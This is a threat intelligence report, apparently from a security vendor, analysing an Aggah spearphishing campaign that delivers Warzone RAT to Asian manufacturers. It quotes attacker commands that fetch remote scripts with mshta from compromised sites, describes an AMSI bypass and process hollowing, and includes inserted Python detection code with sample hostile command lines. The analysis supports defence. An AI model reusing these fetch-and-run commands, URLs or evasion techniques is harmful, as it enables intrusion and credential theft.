<p>Authored by: Tara Gould and Rory Gould</p> <h2>Key Findings</h2> <ul> <li>Spearphishing emails are targeting the manufacturing industry in Taiwan and South Korea to spread malware.</li> <li>Compromised websites are being used to host malicious JavaScript, VBScript and PowerShell scripts that deliver Warzone RAT.</li> <li>Anomali Threat Research assesses with moderate confidence that this campaign is being conducted by the threat group Aggah.</li> </ul> <h2>Overview</h2> <p>Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group. Our analysis found multiple PowerPoint files containing malicious macros that used MSHTA to execute a script, which in turn used PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, we assess with moderate confidence that this is Aggah.</p> <h2>Aggah</h2> <p>Aggah is an information-motivated threat group that was first identified in March 2019 by researchers from Unit 42.<sup>[1]</sup> The researchers initially believed the activity was a campaign targeting entities in the United Arab Emirates (UAE). Further investigation by the same team revealed it to be a global phishing campaign designed to deliver RevengeRAT.<sup>[2]</sup></p> <p>Unit 42 initially assessed that Aggah was associated with the Gorgon Group, a Pakistani group known for targeting Western governments, based on shared high-level TTPs and the common use of RevengeRAT.<sup>[3]</sup> However, prominent Gorgon Group indicators were not observed during that investigation, and therefore Unit 42 was unable to formally associate Aggah with the Gorgon Group.
Other researchers agree that Aggah is an Urdu-speaking Pakistani group, based on the use of Urdu words written in Latin script, but stress that this does not mean it is the Gorgon Group.<sup>[4]</sup></p> <p>Aggah has been consistently active since 2019, generally using the same identifiable TTPs. In 2020 the group conducted a campaign targeting the Italian manufacturing sector.<sup>[5]</sup> Later that same year, Aggah was observed likely selling or loaning malware to lower-level Nigerian actors.<sup>[6]</sup> Historically, the group has used the Internet Archive, Pastebin and Blogspot to host malicious scripts and payloads, usually RevengeRAT.<sup>[7]</sup> The move to compromised sites is a notable change for Aggah and is likely a response to files hosted on the Internet Archive being taken down much more quickly.</p> <h2>Technical Analysis</h2> <h3>Email</h3> <p>The infection process began with a custom spearphishing email masquerading as “FoodHub.co.uk”, an online food delivery service based in the United Kingdom. The body of the email contained order and shipping information, along with an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam”. The email in Figure 1 below was sent on July 8, 2021, to Fon-star International Technology, a Taiwan-based manufacturing company. Other spearphishing emails were sent to CSE group, a Taiwanese manufacturing company; FomoTech, a Taiwanese engineering company; and Hyundai Electric, a Korean power company.
Spoofing business-to-business (B2B) email addresses within the targeted industry is activity consistent with Aggah.<sup>[8]</sup></p> <p style="text-align: center;"><em><strong><img alt="Spoofed Spearphishing Email Sent to Fon Star" src="https://cdn.filestackcontent.com/V07pWmxCSNCzSA5ZAhep"/><br/> Figure 1</strong> - Spoofed Spearphishing Email Sent to Fon Star</em></p> <h3>PowerPoint File</h3> <p><strong>File name </strong>Purchase order 4500061977,pdf.ppam<br/> <strong>MD5 </strong>b5a31dd4a6af746f32149f9706d68f45</p> <p>When we analyzed the PowerPoint file, we found obfuscated macros (Figure 2) in the document that used MSHTA to execute JavaScript from “http://j[.]mp/4545hhhsdf3qassd3asd2”, which resolved to “mail.hoteloscar.in/images/5[.]html”. At the time of publishing, the site was still hosting the malicious script. “J.mp” is a URL-shortening service that is part of Bitly.</p> <p style="text-align: center;"><em><strong><img alt="Macro" src="https://cdn.filestackcontent.com/gczcDJnwTPChVIQfntJw"/><br/> Figure 2</strong> - Macro</em></p> <p>Hoteloscar.in is the legitimate website of a hotel in India that has been compromised to host malicious scripts. Throughout this campaign, we observed legitimate websites being used to host the malicious scripts; most of them appeared to be WordPress sites, indicating the group may have exploited a WordPress vulnerability.</p> <p>The page source contained obfuscated JavaScript, as shown in Figure 3.</p> <p style="text-align: center;"><em><strong><img alt="Obfuscated JavaScript on Hoteloscar.in" src="https://cdn.filestackcontent.com/fC1BDWxoSoitm4vIhuQr"/><br/> Figure 3</strong> - Obfuscated JavaScript on Hoteloscar.in</em></p> <p>The JavaScript used anti-debugging techniques, such as a setInterval timer that detects a debugger from execution time and sends the script into an infinite loop if one is detected.
After the debugging checks, the script returned “mshta http://dlsc.af/wp-admin/buy/5[.]html”, another compromised website, belonging to an Afghan food distributor, shown in Figure 4.</p> <p style="text-align: center;"><em><strong><img alt="mshta http://dlsc.af/wp-admin/buy/5.html" src="https://cdn.filestackcontent.com/HMGddYn2RJWENksyiwS4"/><br/> Figure 4</strong> - “mshta http://dlsc.af/wp-admin/buy/5.html”</em></p> <p>Once directed to “dlsc.af”, an obfuscated script (Figure 5) created a PowerShell process to execute another PowerShell file hosted on dlsc.af, “party.txt”.</p> <p style="text-align: center;"><em><strong><img alt="Obfuscated HTA Script" src="https://cdn.filestackcontent.com/5rWgHS3TTujyEdgvDTVE"/><br/> Figure 5</strong> - Obfuscated HTA Script</em></p> <p style="text-align: center;"><em><strong><img alt="Script to Download AV Checks File" src="https://cdn.filestackcontent.com/gK4h7Q0PTpi2SeNFYY4b"/><br/> Figure 6</strong> - Script to Download AV Checks File</em></p> <p>Party.txt, shown in Figure 7, was a PowerShell file that checked the antivirus status of the host. Four conditions were checked:</p> <ul> <li>Windows Defender status</li> <li>ESET status</li> <li>If Windows Defender is stopped</li> <li>If neither is running</li> </ul> <p>Depending on which condition matched, a different PowerShell file containing a hex-encoded loader and payload was downloaded, and a different loader was used to inject the Warzone payload into various legitimate processes.</p> <p style="text-align: center;"><em><strong><img alt="Party" src="https://cdn.filestackcontent.com/fs2fM6t3TZqR8rXkwr32"/><br/> Figure 7</strong> - Party.txt</em></p> <p>For the purposes of this report, the analysis focuses on the infection chain when Windows Defender was running on the targeted system. With Windows Defender running, a PowerShell file, “wd.txt”, was downloaded and executed.
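</p>
<p>The stages described above carry their loader and payload as hex strings inside PowerShell text. The Python helper below is an added example rather than code from the report: it finds long hex literals assigned to variables in a stager, decodes them and reports whether each blob has a PE header, so an analyst can carve the payload out for sandboxing and hash matching. The sample stager, its variable names and the minimal PE header are constructed for the example.</p>

```python
"""Triage helper for PowerShell stagers that embed hex-encoded binaries.

Added example (not from the Anomali report). It finds long hex literals
assigned to variables (the report describes $HH holding the hex-encoded
Warzone payload), decodes them and reports size, MD5 and whether the
bytes carry a PE header, so an analyst can carve the payload for sandboxing.
"""
import hashlib
import re
import struct

# Only literals of 64 or more hex digits are considered; short hex values
# such as GUIDs or colour codes are ignored.
HEX_LITERAL = re.compile(r"\$(\w+)\s*=\s*['\"]([0-9A-Fa-f]{64,})['\"]")

def extract_hex_blobs(script_text):
    """Return (variable_name, decoded_bytes) for every long hex literal."""
    blobs = []
    for name, hexstr in HEX_LITERAL.findall(script_text):
        if len(hexstr) % 2 == 0:  # odd-length runs cannot be byte strings
            blobs.append((name, bytes.fromhex(hexstr)))
    return blobs

def is_pe(data):
    """True if data has an MZ stub whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"

def triage(script_text):
    """Summarise each embedded blob as a dict with var, size, pe and md5."""
    return [
        {"var": name, "size": len(data), "pe": is_pe(data),
         "md5": hashlib.md5(data).hexdigest()}
        for name, data in extract_hex_blobs(script_text)
    ]

def build_fake_pe():
    """Constructed 96-byte stand-in for a PE: MZ stub, e_lfanew=0x40, PE signature."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 28

# Constructed sample stager: one PE-like blob, one short value that is
# ignored, and one long blob that is not a PE.
SAMPLE_SCRIPT = (
    "$HH = '" + build_fake_pe().hex() + "'\n"
    "$junk = 'deadbeef'\n"
    "$T = '" + "41" * 40 + "'\n"
)

if __name__ == "__main__":
    for entry in triage(SAMPLE_SCRIPT):
        print(entry)
```

<p>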
The infection chain was largely similar for the other antivirus statuses (ESET running and no antivirus running).</p> <p style="text-align: center;"><em><strong><img alt="Screenshot of “wd.txt”" src="https://cdn.filestackcontent.com/75UTBhqiSlWOtytWZs2h"/><br/> Figure 8</strong> - Screenshot of “wd.txt”</em></p> <p>The first function, shown in Figure 8, was decoded using the rolling XOR function shown in Figure 9. It loaded a DLL into memory via reflective DLL injection; the DLL was designed to be used as an AMSI (Antimalware Scan Interface) bypass.</p> <p style="text-align: center;"><em><strong><img alt="Decoding function" src="https://cdn.filestackcontent.com/KqzCtUZIRraAeN5lAR6l"/><br/> Figure 9</strong> - Decoding function</em></p> <p>AMSI allows security products to be integrated with applications. The bypass was performed by memory patching, which changed the behavior of the AmsiScanBuffer function. The code loaded ‘amsi.dll’ with LoadLibrary, used GetProcAddress to locate the function in memory, and then overwrote it after changing the memory protection with VirtualProtect.
The DLL Aggah used to bypass AMSI (shown in Figure 10) was taken from Mor Davidovich, a pentester who wrote the code to evade Windows Defender.<sup>[9]</sup></p> <p style="text-align: center;"><em><strong><img alt="Class AMS that is Loaded for AMSI Bypass" src="https://cdn.filestackcontent.com/EAjsI3ieRqGfrKCiXk6D"/><br/> Figure 10</strong> - Class AMS that is Loaded for AMSI Bypass</em></p> <p style="text-align: center;"><em><strong><img alt="Snippet of Hex Encoded Payload" src="https://cdn.filestackcontent.com/9cKSuD7mROutGZPx9ypM"/><br/> Figure 11</strong> - Snippet of Hex Encoded Payload</em></p> <p>After the AMSI bypass, the variable $HH, a hex-encoded Warzone RAT payload (Figure 11), was loaded into memory and injected into an ASP.NET compiler process.</p> <p style="text-align: center;"><em><strong><img alt="Process Hollowing Function" src="https://cdn.filestackcontent.com/U9068MNTQv6yy2jVasdF"/><br/> Figure 12</strong> - Process Hollowing Function</em></p> <p>As shown in Figure 12, the loader was used to load and inject Warzone into an ASP.NET compiler process. When ESET was running or no antivirus was running, the same payload was loaded and injected into an MSBuild process using either the k.HackItUp or the VNPT.B injector DLL.</p> <h3>Warzone RAT</h3> <p><strong>MD5 </strong>5540511a186c7e9dd1c1465b3b5c8197</p> <p>Warzone RAT is a commodity information stealer written in C++ that is widely available for purchase on criminal forums, and cracked versions are hosted on GitHub. The RAT reuses code from the Ave Maria stealer.<sup>[10]</sup> The functionality of Warzone includes:<sup>[11]</sup></p> <ul> <li>Privilege escalation</li> <li>Keylogging</li> <li>Remote shell</li> <li>Download and execute files</li> <li>File manager</li> <li>Persistence</li> </ul> <p>To bypass User Account Control (UAC), a Windows Defender exclusion path was added via a PowerShell command (Figure 13).
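</p>
<p>The chain described above (PowerPoint macro, mshta.exe, PowerShell, then injection into an ASP.NET compiler or MSBuild process) leaves a distinctive parent/child trail in process-creation telemetry. The Python detection below is an added example, not code from the report or from Anomali: it evaluates constructed Sysmon-style events against that trail and also flags a PowerShell command adding a Windows Defender exclusion, which is the assumed form of the exclusion shown in Figure 13. The image names aspnet_compiler.exe and MSBuild.exe, the paths and the URL are assumptions.</p>

```python
"""Process-tree detection for the delivery chain described above.
Added example (not from the Anomali report): constructed process-creation
events (Sysmon Event ID 1 style) are checked for the parent/child pairs the
report describes. Image paths and the Add-MpPreference form are assumed.
"""
import ntpath

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
INJECTION_TARGETS = {"aspnet_compiler.exe", "msbuild.exe"}

def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()

def classify(event):
    """Return the rule names an event matches (empty list if nothing fires)."""
    parent = image_name(event["parent_image"])
    child = image_name(event["image"])
    cmd = event["command_line"].lower()
    hits = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")           # POWERPNT -> mshta
    if child == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        hits.append("mshta_remote_content")                # mshta <url>
    if parent == "mshta.exe" and child == "powershell.exe":
        hits.append("mshta_spawns_powershell")             # HTA -> party.txt
    if parent == "powershell.exe" and child in INJECTION_TARGETS:
        hits.append("powershell_spawns_injection_target")  # hollowing host
    if child == "powershell.exe" and "add-mppreference" in cmd and "-exclusionpath" in cmd:
        hits.append("defender_exclusion_added")
    return hits

def scan(events):
    """Map the pid of each suspicious event to the rules it matched."""
    alerts = {}
    for event in events:
        hits = classify(event)
        if hits:
            alerts[event["pid"]] = hits
    return alerts

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PPT = r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"

# Constructed events mirroring the chain; the URL and the paths are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "parent_image": r"C:\Windows\explorer.exe", "image": PPT,
     "command_line": r'"POWERPNT.EXE" "Purchase order 4500061977,pdf.ppam"'},
    {"pid": 101, "parent_image": PPT, "image": MSHTA,
     "command_line": "mshta http://shortener.example/placeholder"},
    {"pid": 102, "parent_image": MSHTA, "image": PS,
     "command_line": "powershell.exe -WindowStyle Hidden -File party.txt"},
    {"pid": 103, "parent_image": PS, "command_line": "aspnet_compiler.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"},
    {"pid": 104, "parent_image": PS, "image": PS,
     "command_line": r"powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public"},
]
```

<p>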
Privilege escalation in Warzone was carried out using sdclt.exe, a Windows backup utility in Windows 10.</p> <p style="text-align: center;"><em><strong><img alt="Exclusion Path for PowerShell Command" src="https://cdn.filestackcontent.com/YwkmHMlSPSBQ7Sr2VsUw"/><br/> Figure 13</strong> - Exclusion Path for PowerShell Command</em></p> <p style="text-align: center;"><em><strong><img alt="Warzone Frequently Makes Mention of Security Researchers and Midgetporn" src="https://cdn.filestackcontent.com/s7uHLCtpQsmAzNVH8dA5"/><br/> Figure 14</strong> - Warzone Frequently Makes Mention of Security Researchers and Midgetporn</em></p> <p>Warzone has the capability to steal credentials from a range of browsers and email clients. As shown in Figure 14, these include:</p> <ul> <li>Chromium</li> <li>Foxmail</li> <li>Google Chrome</li> <li>Microsoft Edge</li> <li>Opera</li> <li>Outlook</li> <li>QQ Browser</li> <li>Thunderbird</li> <li>UC Browser</li> </ul> <p style="text-align: center;"><em><strong><img alt="Credential Stores Warzone Checks" src="https://cdn.filestackcontent.com/hd7c9XZJQHikBAvT1DZO"/><br/> Figure 15</strong> - Credential Stores Warzone Checks</em></p> <h2>Attribution</h2> <p>The TTPs used in this campaign align with previous activity of the group known as Aggah.
The attribution to Aggah is based on:</p> <ul> <li> <p>Obfuscated payloads in a PowerShell file, typically hex-encoded.</p> </li> <li> <p>Previous Aggah campaigns used the ‘j.mp’ URL shortener.</p> </li> <li> <p>Reuse of class names (k.HackItUp, VPNT.B, A.B).</p> </li> <li> <p>Spoofed B2B email addresses within the target industry.</p> </li> <li> <p>The use of malicious documents, including PowerPoint files containing macros, is common among Aggah’s previous TTPs.</p> </li> <li> <p>Themes of order and payment information.</p> </li> <li> <p>Use of scripts embedded in websites.</p> </li> <li> <p>Use of ‘RegWrite mshta “url”’ is commonly seen in Aggah campaigns.</p> </li> </ul> <h2>Conclusion</h2> <p>While Aggah has been active since at least 2019 and is known for hosting payloads on the Internet Archive and BlogSpot, this recent campaign suggests the group is able to evolve. The move towards abusing compromised sites shows an ongoing ability to adapt: these sites aid in evading detection, especially now that BlogSpot sites are being taken down and many payloads are promptly removed from the Internet Archive.</p> <h2>Endnotes</h2> <p><sup>[1]</sup> Robert Falcone and Brittany Barbehenn, “Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign,” Unit 42, accessed July 29, 2021, https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/.</p> <p><sup>[2]</sup> Ibid.</p> <p><sup>[3]</sup> Ibid.</p> <p><sup>[4]</sup> M, Winston, “‘Aggah’ campaign continues: Urdu speaking Threat Actor behind the latest campaign which delivers Loki Bot Spyware,” Medium, published April 13, 2021, accessed July 29, 2021, https://winstonmmd.medium.com/?p=c37c08624308.</p> <p><sup>[5]</sup> “Cyber-Criminal Espionage operation insists on Italian Manufacturing,” Yoroi, published May 22, 2020, accessed July 29, 2021,
https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/.</p> <p><sup>[6]</sup> Paul Burbage, “Aggah: Not Exactly APT,” Medium, published February 7, 2020, accessed July 29, 2021, https://medium.com/@paul.k.burbage/aggah-not-exactly-apt-5e51aaff95f5.</p> <p><sup>[7]</sup> Luigi Martire and Luca Mella, “The ‘WayBack’ Campaign: A Large Scale Operation Hiding in Plain Sight,” Yoroi, published June 29, 2020, accessed July 29, 2021, https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/?web_view=true.</p> <p><sup>[8]</sup> Alex Holland, “Aggah Campaign’s Latest Tactics: Victimology, PowerPoint Dropper and Cryptocurrency Stealer,” HP, published July 1, 2020, accessed July 29, 2021, https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/.</p> <p><sup>[9]</sup> “Amsi Bypass Post,” Dec0ne, published November 8, 2019, accessed August 5, 2021, https://dec0ne.github.io/research/2019-11-08-Amsi-bypass-post/.</p> <p><sup>[10]</sup> “Warzone 1.0 RAT Analysis Report,” DomainTools, published September 11, 2019, accessed July 29, 2021, https://www.domaintools.com/resources/blog/warzone-1-0-rat-analysis-report.</p> <p><sup>[11]</sup> “Warzone RAT,” Warzone, accessed July 29, 2021, https://warzone.pw/.</p> <h2>MITRE ATT&CK</h2> <table class="table table-striped"> <tbody> <tr> <td><strong>Tactic</strong></td> <td><strong>ID</strong></td> <td><strong>Name</strong></td> </tr> <tr> <td><strong>Initial Access</strong></td> <td>T1566.001</td> <td>Phishing: Spearphishing Attachment</td> </tr> <tr> <td><strong>Execution</strong></td> <td>T1059</td> <td>Command Line Interface</td> </tr> <tr> <td> </td> <td>T1059.001</td> <td>PowerShell</td> </tr> <tr> <td> </td> <td>T1059.007</td> <td>JavaScript</td> </tr> <tr> <td> </td> <td>T1204.002</td> <td>User Execution: Malicious file</td> </tr> <tr> <td><strong>Persistence</strong></td>
<td>T1547.001</td> <td>Registry Run Keys</td> </tr> <tr> <td><strong>Privilege Escalation</strong></td> <td>T1548.002</td> <td>Bypass User Account Control</td> </tr> <tr> <td> </td> <td>T1055</td> <td>Process Injection</td> </tr> <tr> <td> </td> <td>T1055.012</td> <td>Process Hollowing</td> </tr> <tr> <td> </td> <td>T1547.001</td> <td>Registry Run Keys/Startup Folder</td> </tr> <tr> <td> </td> <td>T1055.001</td> <td>Dynamic-link Library Injection</td> </tr> <tr> <td><strong>Defense Evasion</strong></td> <td>T1140</td> <td>Deobfuscate/Decode Files or Information</td> </tr> <tr> <td> </td> <td>T1562.001</td> <td>Impair Defenses: Disable or Modify Tools</td> </tr> <tr> <td> </td> <td>T1218.005</td> <td>Signed Binary Proxy Execution: Mshta</td> </tr> <tr> <td><strong>Credential Access</strong></td> <td>T1056</td> <td>Input Capture</td> </tr> <tr> <td> </td> <td>T1056.001</td> <td>Keylogging</td> </tr> <tr> <td> </td> <td>T1552.001</td> <td>Credentials In Files</td> </tr> <tr> <td><strong>Lateral Movement</strong></td> <td>T1021.001</td> <td>Remote Desktop Protocol</td> </tr> <tr> <td><strong>Discovery</strong></td> <td>T1057</td> <td>Process Discovery</td> </tr> <tr> <td> </td> <td>T1082</td> <td>System Information Discovery</td> </tr> <tr> <td> </td> <td>T1082</td> <td>File and Directory Discovery</td> </tr> <tr> <td><strong>Collection</strong></td> <td>T1125</td> <td>Video Capture</td> </tr> <tr> <td> </td> <td>T1114.001</td> <td>Email Collection: Local Email Collection</td> </tr> <tr> <td><strong>Command and Control</strong></td> <td>T1105</td> <td>Ingress Tool Transfer</td> </tr> </tbody> </table> <h2>IOCs</h2> <h3>Maldocs and Payloads</h3> <h3>Compromised sites</h3> <h2>Appendix</h2> <p style="text-align: center;"><em><strong><img alt="Similar Campaign Found on Compromised Site of Elmer Floyd, a North Carolina State Representative" src="https://cdn.filestackcontent.com/QLEyjxu4REuIGOV37brj"/><br/> Figure 16</strong> - Similar Campaign Found on Compromised Site of Elmer Floyd, a North Carolina State Representative</em></p> <p style="text-align: center;"><em><strong><img alt="Directory of Malicious Files Hosted on Elmer Floyd Compromised Site" src="https://cdn.filestackcontent.com/KNQNEJspTo6ZdITEqbpK"/><br/> Figure 17</strong> - Directory of Malicious Files Hosted on Elmer Floyd Compromised Site</em></p> <p style="text-align:
center;"><em><strong><img alt="Another Example of a Spoofed Email. This one appears to be spoofing Chemtron, a chemical plant." src="https://cdn.filestackcontent.com/qsl2rNC3QiWQ0uXKcqzD"/><br/> Figure 18</strong> - Another Example of a Spoofed Email. This one appears to be spoofing Chemtron, a chemical plant.</em></p> <p style="text-align: center;"><em><strong><img alt="Same PowerPoint File Sent in Another Spearphishing Email to Hyundai" src="https://cdn.filestackcontent.com/DUVESiz8SdGaw46jUziv"/><br/> Figure 19</strong> - Same PowerPoint File Sent in Another Spearphishing Email to Hyundai</em></p> <p style="text-align: center;"><em><strong><img alt="Another Example of a Spearphishing Email. This one is imitating a real employee from Rexel Group, a US management services company, with a PowerPoint file containing macros." src="https://cdn.filestackcontent.com/BOkbGWZiTP2Agpeu34lS"/><br/> Figure 20</strong> - Another Example of a Spearphishing Email. This one is imitating a real employee from Rexel Group, a US management services company, with a PowerPoint file containing macros.</em></p>